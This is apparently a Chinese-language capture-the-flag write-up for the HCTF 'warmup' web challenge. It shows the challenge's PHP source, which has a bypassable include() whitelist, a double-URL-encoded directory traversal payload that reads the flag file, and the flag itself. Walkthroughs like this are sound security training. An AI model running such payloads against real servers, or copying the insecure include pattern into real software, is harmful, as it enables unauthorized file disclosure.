CTF warmup
2020-09-29 14:01:04
難度係數: ★★
題目來源: HCTF
題目描述: 暫無
題目場景: http://220.249.52.133:38343 (溫馨提示:每次進入URL的埠號都不一樣)
1、點選連結進入如下介面
2、檢視原始碼(按F12或F12+Fn),出現以下程式碼。
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<title>Document</title>
</head>
<body>
<!--source.php-->
<br><img src="https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg" /></body>
</html>
3、發現了「source.php」
則在連結後面加上「/source.php」
既是http://220.249.52.133:38343/source.php
4、輸入URL之後,跳出以下資訊
<?php
highlight_file(__FILE__);
class emmm
{
public static function checkFile(&$page)
{
$whitelist = ["source"=>"source.php","hint"=>"hint.php"];
if (! isset($page) || !is_string($page)) {
echo "you can't see it";
return false;
}
if (in_array($page, $whitelist)) {
return true;
}
$_page = mb_substr(
$page,
0,
mb_strpos($page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
$_page = urldecode($page);
$_page = mb_substr(
$_page,
0,
mb_strpos($_page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
echo "you can't see it";
return false;
}
}
if (! empty($_REQUEST['file'])
&& is_string($_REQUEST['file'])
&& emmm::checkFile($_REQUEST['file'])
) {
include $_REQUEST['file'];
exit;
} else {
echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
}
?>
5、發現了關鍵資訊
$whitelist = [「source」=>「source.php」,「hint」=>「hint.php」];
6、在連結後加上/hint.php
URL: http://220.249.52.133:38343/hint.php
7、輸入URL,出現以下資訊
8、然後構造payload
?file=source.php%253f/../../../../ffffllllaaaagggg
URL: http://220.249.52.133:38343/source.php?file=source.php%253f/../../../../ffffllllaaaagggg
這樣也可以,等等!
9、找到flag
10、OK
flag{25e7bce6005c4e0c983fb97297ac6e5a}